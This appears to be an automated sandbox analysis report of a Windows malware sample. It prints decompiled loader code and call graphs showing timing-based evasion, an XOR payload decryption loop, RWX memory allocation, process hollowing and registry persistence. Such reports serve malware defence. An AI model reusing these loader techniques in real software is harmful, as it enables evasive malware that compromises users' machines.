6847 4087c7 6845->6847 6848 4087f0 6846->6848 6849 401e14 __wsopen_helper 11 API calls 6847->6849 6857 408737 6848->6857 6849->6850 6850->6823 6907 4061c5 LeaveCriticalSection 6854->6907 6856 406f85 6856->6819 6858 408748 6857->6858 6859 40875c 6857->6859 6861 401e66 __set_osfhnd 66 API calls 6858->6861 6860 408758 6859->6860 6862 40343d __flush 97 API calls 6859->6862 6873 408810 6860->6873 6863 40874d 6861->6863 6864 408768 6862->6864 6865 401e14 __wsopen_helper 11 API calls 6863->6865 6876 408e40 6864->6876 6865->6860 6868 402c6e __fclose_nolock 66 API calls 6869 408776 6868->6869 6880 408a6a 6869->6880 6871 40877c 6871->6860 6872 4012b0 _free 66 API calls 6871->6872 6872->6860 6874 402e4d _fseek 2 API calls 6873->6874 6875 408816 6874->6875 6875->6850 6877 408e50 6876->6877 6878 408770 6876->6878 6877->6878 6879 4012b0 _free 66 API calls 6877->6879 6878->6868 6879->6878 6881 408a76 _doexit 6880->6881 6882 408a99 6881->6882 6883 408a7e 6881->6883 6885 408aa5 6882->6885 6888 408adf 6882->6888 6884 401e79 __set_osfhnd 66 API calls 6883->6884 6886 408a83 6884->6886 6887 401e79 __set_osfhnd 66 API calls 6885->6887 6889 401e66 __set_osfhnd 66 API calls 6886->6889 6890 408aaa 6887->6890 6891 406c8c ___lock_fhandle 68 API calls 6888->6891 6892 408a8b _doexit 6889->6892 6893 401e66 __set_osfhnd 66 API calls 6890->6893 6894 408ae5 6891->6894 6892->6871 6895 408ab2 6893->6895 6896 408af3 6894->6896 6897 408aff 6894->6897 6898 401e14 __wsopen_helper 11 API calls 6895->6898 6899 4089ce __close_nolock 69 API calls 6896->6899 6900 401e66 __set_osfhnd 66 API calls 6897->6900 6898->6892 6901 408af9 6899->6901 6900->6901 6903 408b26 6901->6903 6906 406d2b LeaveCriticalSection 6903->6906 6905 408b2c 6905->6892 6906->6905 6907->6856 6546 403bdc 6547 403c18 6546->6547 6548 403bee 6546->6548 6548->6547 6550 4062d1 6548->6550 6551 4062dd _doexit 6550->6551 6552 4042f0 __getptd 66 API calls 6551->6552 6553 4062e2 6552->6553 6556 4086d1 6553->6556 6565 406370 DecodePointer 6556->6565 6558 4086d6 6559 4086e1 6558->6559 6566 40637d 6558->6566 6561 4086f9 6559->6561 6563 401c99 __call_reportfault 8 API calls 6559->6563 6562 402208 __amsg_exit 66 API calls 6561->6562 6564 408703 6562->6564 6563->6561 6565->6558 6570 406389 _doexit 6566->6570 6567 4063e4 6568 4063c6 DecodePointer 6567->6568 6574 4063f3 6567->6574 6573 4063b5 _siglookup 6568->6573 6569 4063b0 6571 404277 __getptd_noexit 66 API calls 6569->6571 6570->6567 6570->6568 6570->6569 6575 4063ac 6570->6575 6571->6573 6578 406450 6573->6578 6580 402208 __amsg_exit 66 API calls 6573->6580 6586 4063be _doexit 6573->6586 6576 401e66 __set_osfhnd 66 API calls 6574->6576 6575->6569 6575->6574 6577 4063f8 6576->6577 6579 401e14 __wsopen_helper 11 API calls 6577->6579 6581 40629e __lock 66 API calls 6578->6581 6582 40645b 6578->6582 6579->6586 6580->6578 6581->6582 6584 406490 6582->6584 6587 404140 RtlEncodePointer 6582->6587 6588 4064e4 6584->6588 6586->6559 6587->6584 6589 4064f1 6588->6589 6590 4064ea 6588->6590 6589->6586 6592 4061c5 LeaveCriticalSection 6590->6592 6592->6589 6667 403c1e SetUnhandledExceptionFilter 6355 230f9c 6368 23005f GetPEB 6355->6368 6357 231120 6369 230f1d 6357->6369 6359 2311d6 6360 231128 6360->6359 6382 230422 6360->6382 6363 231236 VirtualAlloc ReadFile 6363->6359 6366 23126c 6363->6366 6364 231285 6366->6364 6367 231666 ExitProcess 6366->6367 6396 2308ef 6366->6396 6368->6357 6410 23005f GetPEB 6369->6410 6371 230f31 6411 23005f GetPEB 6371->6411 6373 230f44 6412 23005f GetPEB 6373->6412 6375 230f57 6413 230ebf 6375->6413 6377 230f65 6378 230f81 VirtualAllocExNuma 6377->6378 6379 230f8e 6378->6379 6418 230e1f 6379->6418 6425 23005f GetPEB 6382->6425 6384 23066b 6384->6384 6385 230786 SHGetFolderPathW 6384->6385 6386 2307a2 6385->6386 6387 230813 CreateFileW 6385->6387 6386->6387 6426 23037c 6386->6426 6387->6359 6387->6363 6392 23085e RegGetValueW 6392->6387 6393 23087b RegOpenKeyExW 6392->6393 6393->6392 6394 230897 RegSetValueExW 6393->6394 6394->6387 6444 23005f GetPEB 6396->6444 6398 230a98 6398->6366 6399 230aa6 CreateProcessW 6401 230ad0 6399->6401 6409 2308fd 6399->6409 6400 230af5 ReadProcessMemory 6400->6401 6400->6409 6401->6398 6472 231a23 6401->6472 6404 231a23 11 API calls 6404->6409 6405 231bd2 11 API calls 6405->6409 6407 230d5a Wow64SetThreadContext 6407->6401 6407->6409 6409->6398 6409->6399 6409->6400 6409->6401 6409->6404 6409->6405 6409->6407 6445 231ab8 6409->6445 6454 231871 6409->6454 6463 231972 6409->6463 6410->6371 6411->6373 6412->6375 6423 23005f GetPEB 6413->6423 6415 230ecf 6416 230ed5 GetSystemInfo 6415->6416 6417 230f00 6416->6417 6417->6377 6424 23005f GetPEB 6418->6424 6420 230e2b 6421 230e4b VirtualAlloc 6420->6421 6422 230e68 6421->6422 6422->6360 6423->6415 6424->6420 6425->6384 6442 23005f GetPEB 6426->6442 6428 2303d6 6429 230401 PathFileExistsW 6428->6429 6430 23041a 6429->6430 6431 23040d CreateDirectoryW 6429->6431 6430->6387 6432 23020a 6430->6432 6431->6430 6443 23005f GetPEB 6432->6443 6434 23026a 6435 2302db PathFileExistsW 6434->6435 6436 230309 6435->6436 6437 2302ec CreateFileW 6435->6437 6436->6387 6436->6392 6437->6436 6438 23030d 6437->6438 6438->6436 6439 230318 VirtualAlloc 6438->6439 6439->6436 6440 23032e ReadFile 6439->6440 6440->6436 6441 23033d CloseHandle CreateFileW WriteFile 6440->6441 6441->6436 6442->6428 6443->6434 6444->6409 6446 231ad3 6445->6446 6481 23013e GetPEB 6446->6481 6448 231af4 6449 231bac 6448->6449 6450 231afc 6448->6450 6498 231efe 6449->6498 6483 231672 6450->6483 6453 231b93 6453->6409 6455 23188c 6454->6455 6456 23013e GetPEB 6455->6456 6457 2318ad 6456->6457 6458 2318b5 6457->6458 6459 23193f 6457->6459 6460 231672 10 API calls 6458->6460 6508 231f22 6459->6508 6462 231926 6460->6462 6462->6409 6464 23198d 6463->6464 6465 23013e GetPEB 6464->6465 6466 2319ae 6465->6466 6467 2319b2 6466->6467 6468 2319f8 6466->6468 6469 231672 10 API calls 6467->6469 6511 231f34 6468->6511 6471 2319ed 6469->6471 6471->6409 6473 231a36 6472->6473 6474 23013e GetPEB 6473->6474 6475 231a57 6474->6475 6476 231aa1 6475->6476 6477 231a5b 6475->6477 6514 231eec 6476->6514 6478 231672 10 API calls 6477->6478 6480 231a96 6478->6480 6480->6398 6482 230160 6481->6482 6482->6448 6501 23005f GetPEB 6483->6501 6485 2316bb 6502 230109 GetPEB 6485->6502 6488 231748 6489 231759 VirtualAlloc 6488->6489 6493 23181d 6488->6493 6490 23176f ReadFile 6489->6490 6489->6493 6491 231784 VirtualAlloc 6490->6491 6490->6493 6492 2317a5 6491->6492 6491->6493 6492->6493 6496 231810 VirtualFree 6492->6496 6497 23180c CloseHandle 6492->6497 6494 231866 6493->6494 6495 23185b VirtualFree 6493->6495 6494->6453 6495->6494 6496->6493 6497->6496 6499 231672 10 API calls 6498->6499 6500 231f08 6499->6500 6500->6453 6501->6485 6503 23011c 6502->6503 6505 230131 CreateFileW 6503->6505 6506 23017b GetPEB 6503->6506 6505->6488 6505->6493 6507 23019f 6506->6507 6507->6503 6509 231672 10 API calls 6508->6509 6510 231f2c 6509->6510 6510->6462 6512 231672 10 API calls 6511->6512 6513 231f3e 6512->6513 6513->6471 6515 231672 10 API calls 6514->6515 6516 231ef6 6515->6516 6516->6480

                                      Control-flow Graph

                                      C-Code - Quality: 70%
                                      			E00401000(struct HINSTANCE__* _a4, long _a12) {
                                      				int _v8;
                                      				char _v12;
                                      				struct _PROCESS_INFORMATION _v28;
                                      				struct tagMSG _v56;
                                      				struct _STARTUPINFOW _v124;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				long _t34;
                                      				long _t35;
                                      				WCHAR* _t37;
                                      				void* _t39;
                                      				int _t45;
                                      				int _t47;
                                      				struct HWND__* _t52;
                                      				int _t62;
                                      				void* _t66;
                                      				long _t68;
                                      				void* _t70;
                                      				void* _t76;
                                      				struct HINSTANCE__* _t77;
                                      				struct HACCEL__* _t78;
                                      				long _t79;
                                      				long _t80;
                                      				struct HWND__** _t81;
                                      				signed int _t82;
                                      				void* _t88;
                                      				signed int _t89;
                                      				void* _t93;
                                      
                                      				_t34 = GetTickCount();
                                      				Sleep(0x2be); // executed
                                      				_t35 = GetTickCount();
                                      				_t96 = _t35 - _t34 - 0x2bc;
                                      				if(_t35 - _t34 < 0x2bc) {
                                      					L4:
                                      					_t37 = GetCommandLineW();
                                      					0x400000(_t37);
                                      					if(_t37 == 0) {
                                      						_t39 = GetCurrentProcess();
                                      						__imp__IsWow64Process(_t39,  &_v8);
                                      						__eflags = _t39;
                                      						if(_t39 == 0) {
                                      							L11:
                                      							__imp__#17();
                                      							_t77 = _a4;
                                      							LoadStringW(_t77, 0x67, 0x40cee0, 6);
                                      							LoadStringW(_t77, 0xa1, 0x40dd40, 9);
                                      							 *0x40dd3c = _t77;
                                      							__eflags = _a12;
                                      							if(_a12 == 0) {
                                      								goto L5;
                                      							}
                                      							_t78 = LoadAcceleratorsW(_t77, 0x6d);
                                      							while(1) {
                                      								_t45 = GetMessageW( &_v56, 0, 0, 0);
                                      								__eflags = _t45;
                                      								if(_t45 == 0) {
                                      									break;
                                      								}
                                      								_t47 = TranslateAcceleratorW( *0x40ddc0, _t78,  &_v56);
                                      								__eflags = _t47;
                                      								if(_t47 != 0) {
                                      									continue;
                                      								}
                                      								__eflags = _v56.message - 0x100;
                                      								if(_v56.message != 0x100) {
                                      									L18:
                                      									TranslateMessage( &_v56);
                                      									DispatchMessageW( &_v56);
                                      									continue;
                                      								}
                                      								__eflags = _v56.wParam - 9;
                                      								if(_v56.wParam != 9) {
                                      									goto L18;
                                      								}
                                      								_t52 = GetParent(_v56);
                                      								_t81 =  *0x400000; // 0x905a4d
                                      								__eflags = _t52 -  *_t81;
                                      								if(_t52 !=  *_t81) {
                                      									goto L18;
                                      								}
                                      								PostMessageW( *_t81, 0x111, 0x8067, 0);
                                      							}
                                      							DestroyMenu( *0x40ddc4);
                                      							return _v56.wParam;
                                      						}
                                      						__eflags = _v8;
                                      						if(_v8 == 0) {
                                      							goto L11;
                                      						}
                                      						_t79 = 0x44;
                                      						E00401A70( &_v124, 0, _t79);
                                      						_v124.cb = _t79;
                                      						__imp__Wow64DisableWow64FsRedirection( &_v12);
                                      						_t62 = CreateProcessW(L"C:\\windows\\regedit.exe", GetCommandLineW(), 0, 0, 0, 0, 0, 0,  &_v124,  &_v28);
                                      						__eflags = _t62;
                                      						if(_t62 == 0) {
                                      							__imp__Wow64RevertWow64FsRedirection(_v12);
                                      							goto L11;
                                      						}
                                      						WaitForSingleObject(_v28.hProcess, 0xffffffff);
                                      						GetExitCodeProcess(_v28,  &_a12);
                                      						ExitProcess(_a12);
                                      					}
                                      					L5:
                                      					return 0;
                                      				}
                                      				_t66 = E00401A4F(_a12, L"rb"); // executed
                                      				_push(2);
                                      				_t88 = _t66;
                                      				_push(0);
                                      				_push(_t88); // executed
                                      				E00401915(_t76, _t88, 0, _t96); // executed
                                      				_push(_t88); // executed
                                      				_t68 = E00401826(_t76, _t88, 0, _t96); // executed
                                      				_push(0);
                                      				_push(0);
                                      				_push(_t88);
                                      				_t80 = _t68; // executed
                                      				E00401915(_t80, _t88, 0, _t96); // executed
                                      				_t70 = VirtualAlloc(0, _t80, 0x3000, 0x40); // executed
                                      				_a12 = _t70;
                                      				E00401675(_t70, _t80, 1, _t88); // executed
                                      				_t93 = _t93 + 0x34;
                                      				_t82 = 0;
                                      				if(_t80 <= 0) {
                                      					L3:
                                      					GetCommandLineW();
                                      					goto L4;
                                      				} else {
                                      					goto L2;
                                      				}
                                      				do {
                                      					L2:
                                      					asm("cdq");
                                      					_t89 = 0xc;
                                      					 *(_t82 + _a12) =  *(_t82 + _a12) ^  *("248058040134" + _t82 % _t89);
                                      					_t82 = _t82 + 1;
                                      				} while (_t82 < _t80);
                                      				goto L3;
                                      			}

































                                      0x0040100f
                                      0x00401018
                                      0x0040101e
                                      0x00401024
                                      0x00401029
                                      0x00401097
                                      0x0040109d
                                      0x004010a0
                                      0x004010a7
                                      0x004010b4
                                      0x004010bb
                                      0x004010c1
                                      0x004010c3
                                      0x00401132
                                      0x00401132
                                      0x00401138
                                      0x0040114b
                                      0x0040115a
                                      0x0040115c
                                      0x00401162
                                      0x00401165
                                      0x00000000
                                      0x00000000
                                      0x0040117a
                                      0x004011de
                                      0x004011e5
                                      0x004011e7
                                      0x004011e9
                                      0x00000000
                                      0x00000000
                                      0x00401189
                                      0x0040118f
                                      0x00401191
                                      0x00000000
                                      0x00000000
                                      0x00401193
                                      0x0040119a
                                      0x004011ca
                                      0x004011ce
                                      0x004011d8
                                      0x00000000
                                      0x004011d8
                                      0x0040119c
                                      0x004011a0
                                      0x00000000
                                      0x00000000
                                      0x004011a5
                                      0x004011ab
                                      0x004011b1
                                      0x004011b3
                                      0x00000000
                                      0x00000000
                                      0x004011c2
                                      0x004011c2
                                      0x004011f1
                                      0x00000000
                                      0x004011f7
                                      0x004010c5
                                      0x004010c8
                                      0x00000000
                                      0x00000000
                                      0x004010cc
                                      0x004010d3
                                      0x004010df
                                      0x004010e2
                                      0x004010fe
                                      0x00401104
                                      0x00401106
                                      0x0040112c
                                      0x00000000
                                      0x0040112c
                                      0x0040110d
                                      0x0040111a
                                      0x00401123
                                      0x00401123
                                      0x004010a9
                                      0x00000000
                                      0x004010a9
                                      0x00401033
                                      0x00401038
                                      0x0040103a
                                      0x0040103c
                                      0x0040103d
                                      0x0040103e
                                      0x00401043
                                      0x00401044
                                      0x00401049
                                      0x0040104a
                                      0x0040104b
                                      0x0040104c
                                      0x0040104e
                                      0x0040105f
                                      0x0040106a
                                      0x0040106d
                                      0x00401072
                                      0x00401075
                                      0x00401079
                                      0x00401094
                                      0x00401094
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040107b
                                      0x0040107b
                                      0x0040107d
                                      0x00401080
                                      0x0040108c
                                      0x0040108f
                                      0x00401090
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0040100F
                                      • Sleep.KERNELBASE(000002BE), ref: 00401018
                                      • GetTickCount.KERNEL32 ref: 0040101E
                                      • GetCommandLineW.KERNEL32 ref: 0040109D
                                        • Part of subcall function 00401A4F: __wfsopen.LIBCMT ref: 00401A5C
                                      • _fseek.LIBCMT ref: 0040103E
                                      • _fseek.LIBCMT ref: 0040104E
                                        • Part of subcall function 00401915: __lock_file.LIBCMT ref: 00401956
                                        • Part of subcall function 00401915: __fseek_nolock.LIBCMT ref: 00401967
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0040105F
                                      • __fread_nolock.LIBCMT ref: 0040106D
                                      • GetCommandLineW.KERNEL32 ref: 00401094
                                      • GetCurrentProcess.KERNEL32(?), ref: 004010B4
                                      • IsWow64Process.KERNEL32(00000000), ref: 004010BB
                                      • _memset.LIBCMT ref: 004010D3
                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010E2
                                      • GetCommandLineW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010F6
                                      • CreateProcessW.KERNEL32(C:\windows\regedit.exe,00000000), ref: 004010FE
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040110D
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0040111A
                                      • ExitProcess.KERNEL32 ref: 00401123
                                      • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0040112C
                                      • #17.COMCTL32 ref: 00401132
                                      • LoadStringW.USER32(?,00000067,0040CEE0,00000006), ref: 0040114B
                                      • LoadStringW.USER32(?,000000A1,0040DD40,00000009), ref: 0040115A
                                      • LoadAcceleratorsW.USER32 ref: 0040116E
                                      • TranslateAcceleratorW.USER32(00000000,?), ref: 00401189
                                      • GetParent.USER32(?), ref: 004011A5
                                      • PostMessageW.USER32 ref: 004011C2
                                      • TranslateMessage.USER32(?), ref: 004011CE
                                      • DispatchMessageW.USER32(?), ref: 004011D8
                                      • GetMessageW.USER32 ref: 004011E5
                                      • DestroyMenu.USER32 ref: 004011F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924194536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.924182043.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924222719.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000006.00000002.924287727.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: ProcessWow64$Message$CommandLineLoad$CountExitRedirectionStringTickTranslate_fseek$AcceleratorAcceleratorsAllocCodeCreateCurrentDestroyDisableDispatchMenuObjectParentPostRevertSingleSleepVirtualWait__fread_nolock__fseek_nolock__lock_file__wfsopen_memset
                                      • String ID: C:\windows\regedit.exe
                                      • API String ID: 3173031976-2898893780
                                      • Opcode ID: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction ID: b5c5d907f046bb421fc019989e3b7981bd47ba42383611c00ead7985f5c1367a
                                      • Opcode Fuzzy Hash: 13f8cff66a533022ee180b1c7ee89b48ba83d43a267836f3488401742cd5cd2c
                                      • Instruction Fuzzy Hash: EE516C71A00209ABEB10AFB1DD49EAF7B7DAF49754F100036F601B61E2D7788D41CB68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 302 230f9c-2311d4 call 23005f call 230f1d call 230073 * 8 324 2311d6 302->324 325 2311db-2311ee 302->325 326 23166e-231671 324->326 328 2311f0 325->328 329 2311f5-23122f call 230422 CreateFileW 325->329 328->326 332 231231 329->332 333 231236-231265 VirtualAlloc ReadFile 329->333 332->326 334 231267 333->334 335 23126c-23127f 333->335 334->326 337 231655-231664 call 2308ef 335->337 338 231285-231650 335->338 341 231666-231668 ExitProcess 337->341
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: AllocNumaVirtual
                                      • String ID:
                                      • API String ID: 4233825816-0
                                      • Opcode ID: 4449a45cc8191baca1272d1096ede701ca8ee6e5b8e76b9f9b49aed67f60b4ab
                                      • Instruction ID: f506bcac088990cd7ec066eac1e53cb75a3692dafaeb9cb5e8a02135c0a37d33
                                      • Opcode Fuzzy Hash: 4449a45cc8191baca1272d1096ede701ca8ee6e5b8e76b9f9b49aed67f60b4ab
                                      • Instruction Fuzzy Hash: EF32E820D5C3D8ADDB12CBF994217FCBFB05F1A201F1841CAE5E4EA292D176478ADB25
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 504 230ebf-230f05 call 23005f call 230073 GetSystemInfo 510 230f07-230f0a 504->510 511 230f0e 504->511 512 230f10-230f13 510->512 511->512
                                      APIs
                                      • GetSystemInfo.KERNELBASE(?), ref: 00230EDC
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                      • Instruction ID: 3cce4c23dcf1c66da6c21d83900fb1f62e94af8670bf1e1e76983fee0471f2f1
                                      • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                      • Instruction Fuzzy Hash: 8BF0A7B1D2410CABDB1CEAB888A5BAE77ACD708200F104569E606D2540D97485504674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 35 231672-231742 call 23005f call 230073 * 7 call 230109 CreateFileW 54 231821 35->54 55 231748-231753 35->55 56 231823-231828 54->56 55->54 60 231759-231769 VirtualAlloc 55->60 58 23182a 56->58 59 23182e-231833 56->59 58->59 63 23184f-231852 59->63 60->54 62 23176f-23177e ReadFile 60->62 62->54 64 231784-2317a3 VirtualAlloc 62->64 65 231835-231839 63->65 66 231854-231859 63->66 67 2317a5-2317b8 call 2300da 64->67 68 23181d-23181f 64->68 69 231845-231847 65->69 70 23183b-231843 65->70 71 231866-23186e 66->71 72 23185b-231863 VirtualFree 66->72 77 2317f3-231803 call 230073 67->77 78 2317ba-2317c5 67->78 68->56 74 231849-23184c 69->74 75 23184e 69->75 70->63 72->71 74->63 75->63 77->56 84 231805-23180a 77->84 79 2317c8-2317f1 call 2300da 78->79 79->77 85 231810-23181b VirtualFree 84->85 86 23180c-23180d CloseHandle 84->86 85->63 86->85
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00231F08,7FAB7E30), ref: 00231738
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000,00000040), ref: 00231762
                                      • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000), ref: 00231779
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000,00000040), ref: 0023179B
                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000,00000040,?,00000000,0000000E), ref: 0023180D
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000,00000040,?), ref: 00231818
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00231F08,7FAB7E30,00231BC6,00000000,00000040,?), ref: 00231863
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                      • String ID:
                                      • API String ID: 721982790-0
                                      • Opcode ID: 73c3d2c2b0b01a32b18a0c31adb1195199544d4ad7837ad6d00ddea3db0bba5a
                                      • Instruction ID: 3c396456dfd0a3492b20d2ae5cbe8d3b19055bae380170a542d74c1b5bc82802
                                      • Opcode Fuzzy Hash: 73c3d2c2b0b01a32b18a0c31adb1195199544d4ad7837ad6d00ddea3db0bba5a
                                      • Instruction Fuzzy Hash: 855181B1E20319ABEB249FB4DC95BAEB7B9EF08710F144515F940F7280DB749D218B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 87 23020a-2302e6 call 23005f call 230073 * 8 PathFileExistsW 107 230373-230379 87->107 108 2302ec-230307 CreateFileW 87->108 109 230309-23030b 108->109 110 23030d-230316 108->110 109->107 110->109 112 230318-23032c VirtualAlloc 110->112 112->109 113 23032e-23033b ReadFile 112->113 113->109 114 23033d-230368 CloseHandle CreateFileW WriteFile 113->114 115 23036a-23036c 114->115 116 23036d-230371 114->116 115->116 116->107
                                      APIs
                                      • PathFileExistsW.SHLWAPI(?), ref: 002302E1
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 002302FF
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00230324
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00230336
                                      • CloseHandle.KERNELBASE(00000000), ref: 0023033E
                                      • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 00230354
                                      • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00230363
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.924056794.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_230000_efwhixxln.jbxd
                                      Similarity
                                      • API ID: File$Create$AllocCloseExistsHandlePathReadVirtualWrite
                                      • String ID:
                                      • API String ID: 1383296624-0
                                      • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                      • Instruction ID: 9457736a464e283428b1d9f48ff4658d4836503d51cf218ea5b6a994bd3bbda6
                                      • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                      • Instruction Fuzzy Hash: 53416DB5E10209BAEB10AFF4ECA5FAEB678EF44B50F10451AF910F6190E7749A108779
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 118 40142b-401447 119 401463 118->119 120 401449-40144d 118->120 121 401465-401469 119->121 120->119 122 40144f-401451 120->122 123 401453-401458 call 401e66 122->123 124 40146a-40146f 122->124 136 40145e call 401e14 123->136 125 401471-40147b 124->125 126 40147d-401480 124->126 125->126 128 40149e-4014ae 125->128 129 401482-40148b call 401a70 126->129 130 40148e-401490 126->130 134 4014b0-4014b6 128->134 135 4014b8 128->135 129->130 130->123 133 401492-40149c 130->133 133->123 133->128 138 4014bf-4014c1 134->138 135->138 136->119 140 4015a1-4015a4 138->140 141 4014c7-4014ce 138->141 140->121 142 4014d0-4014d5 141->142 143 401514-401517 141->143 142->143 146 4014d7 142->146 144 401575-401576 call 40249f 143->144 145 401519-40151d 143->145 155 40157b-40157f 144->155 150 40153e-401545 145->150 151 40151f-401528 145->151 147 4014dd-4014e1 146->147 148 4015cf 146->148 152 4014e3 147->152 153 4014e5-4014e8 147->153 154 4015d3-4015dc 148->154 158 401547 150->158 159 401549-40154c 150->159 156 401533-401538 151->156 157 40152a-401531 151->157 152->153 160 4015a9-4015ad 153->160 161 4014ee-40150f call 402c94 153->161 154->121 155->154 162 401581-401585 155->162 163 40153a-40153c 156->163 157->163 158->159 159->160 164 40154e-40155a call 402c6e call 402b78 159->164 168 4015bf-4015ca call 401e66 160->168 169 4015af-4015bc call 401a70 160->169 173 401599-40159b 161->173 162->160 167 401587-401596 162->167 163->159 178 40155f-401564 164->178 167->173 168->136 169->168 173->140 173->141 179 4015e1-4015e5 178->179 180 401566-401569 178->180 179->154 180->148 181 40156b-401573 180->181 181->173
                                      C-Code - Quality: 97%
                                      			E0040142B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                      				signed int _v8;
                                      				char* _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t82;
                                      				char _t89;
                                      				signed int _t96;
                                      				signed int _t98;
                                      				signed int _t101;
                                      				signed int _t104;
                                      				signed int _t108;
                                      				signed int _t109;
                                      				char* _t110;
                                      				signed int _t120;
                                      				signed int _t123;
                                      				signed int _t124;
                                      				signed int _t125;
                                      				signed int _t126;
                                      				void* _t127;
                                      
                                      				_t110 = _a4;
                                      				_t108 = _a8;
                                      				_t123 = _a12;
                                      				_v12 = _t110;
                                      				_v8 = _t108;
                                      				if(_t123 == 0 || _a16 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					_t131 = _t110;
                                      					if(_t110 != 0) {
                                      						_t126 = _a20;
                                      						__eflags = _t126;
                                      						if(_t126 == 0) {
                                      							L9:
                                      							__eflags = _t108 - 0xffffffff;
                                      							if(_t108 != 0xffffffff) {
                                      								_t82 = E00401A70(_t110, 0, _t108);
                                      								_t127 = _t127 + 0xc;
                                      							}
                                      							__eflags = _t126;
                                      							if(__eflags == 0) {
                                      								goto L3;
                                      							} else {
                                      								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                      								if(__eflags > 0) {
                                      									goto L3;
                                      								}
                                      								L13:
                                      								_t124 = _t123 * _a16;
                                      								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      								_v20 = _t124;
                                      								_t109 = _t124;
                                      								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      									_v16 = 0x1000;
                                      								} else {
                                      									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      								}
                                      								__eflags = _t124;
                                      								if(_t124 == 0) {
                                      									L40:
                                      									return _a16;
                                      								} else {
                                      									do {
